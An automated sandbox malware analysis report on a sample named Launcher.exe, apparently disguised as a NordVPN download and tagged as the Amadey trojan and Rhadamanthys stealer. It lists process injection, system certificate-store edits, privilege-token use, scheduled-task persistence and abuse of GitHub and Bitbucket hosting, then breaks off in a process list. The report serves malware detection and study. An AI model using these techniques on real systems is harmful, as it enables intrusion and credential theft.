Malware Analysis Report

2024-11-30 02:15

Sample ID 240329-r9vtpsah3s
Target Launcher.exe
SHA256 fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03
Tags
amadey rhadamanthys stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fb07af2aead3bdf360f555fc872191e43c2f0acbfc9258435f9a30afe272ba03

Threat Level: Known bad

The file Launcher.exe was found to be: Known bad.

Malicious Activity Summary

amadey rhadamanthys stealer trojan

Amadey

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Legitimate hosting services abused for malware hosting/C2

Checks computer location settings

Executes dropped EXE

Enumerates physical storage devices

Program crash

NTFS ADS

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-29 14:54

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-29 14:54

Reported

2024-03-29 15:01

Platform

win10v2004-20240226-en

Max time kernel

233s

Max time network

275s

Command Line

sihost.exe

Signatures

Amadey

trojan amadey

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3700 created 2768 N/A C:\Users\Admin\AppData\Roaming\services\plugin16904 C:\Windows\system32\sihost.exe

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A bitbucket.org N/A N/A
N/A raw.githubusercontent.com N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\NordVPN-10_11\Launcher.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services\Launhcer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\services\data\Launcher.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3045580317-3728985860-206385570-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0282000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 5c000000010000000400000000080000040000000100000010000000c5dfb849ca051355ee2dba1ac33eb028030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b0b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 0f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba953030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad2000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f C:\Users\Admin\AppData\Local\Temp\Launcher.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\NordVPN-10_11.zip:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 820 wrote to memory of 1220 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 820 wrote to memory of 1220 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 820 wrote to memory of 1220 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 820 wrote to memory of 1220 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 820 wrote to memory of 1220 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 820 wrote to memory of 1220 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 820 wrote to memory of 1220 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 820 wrote to memory of 1220 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 820 wrote to memory of 1220 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 820 wrote to memory of 1220 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 820 wrote to memory of 1220 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 1764 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 1764 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2892 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2068 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2068 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 1220 wrote to memory of 2068 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\system32\sihost.exe

sihost.exe

C:\Users\Admin\AppData\Local\Temp\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.0.1356778034\781898511" -parentBuildID 20221007134813 -prefsHandle 1888 -prefMapHandle 1880 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {bac3c253-492e-4754-8824-332a5a2ce8c1} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 1980 1450b8f6a58 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.1.824453598\2145723619" -parentBuildID 20221007134813 -prefsHandle 2368 -prefMapHandle 2364 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {acaa10f2-4a25-4541-ba6c-256fe5ca92f9} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 2380 1450b7f5458 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.2.353070175\1465853438" -childID 1 -isForBrowser -prefsHandle 3404 -prefMapHandle 3400 -prefsLen 20823 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {438e99c7-e7df-4dcd-88d1-7e7cf4d178fd} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 3120 1450f9bdc58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1220.3.1668280839\1170008933" -childID 2 -isForBrowser -prefsHandle 3576 -prefMapHandle 3572 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1300 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec4c2570-f71b-4ea2-86f9-0942de763845} 1220 "\\.\pipe\gecko-crash-server-pipe.1220" 3588 1450e3ad558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

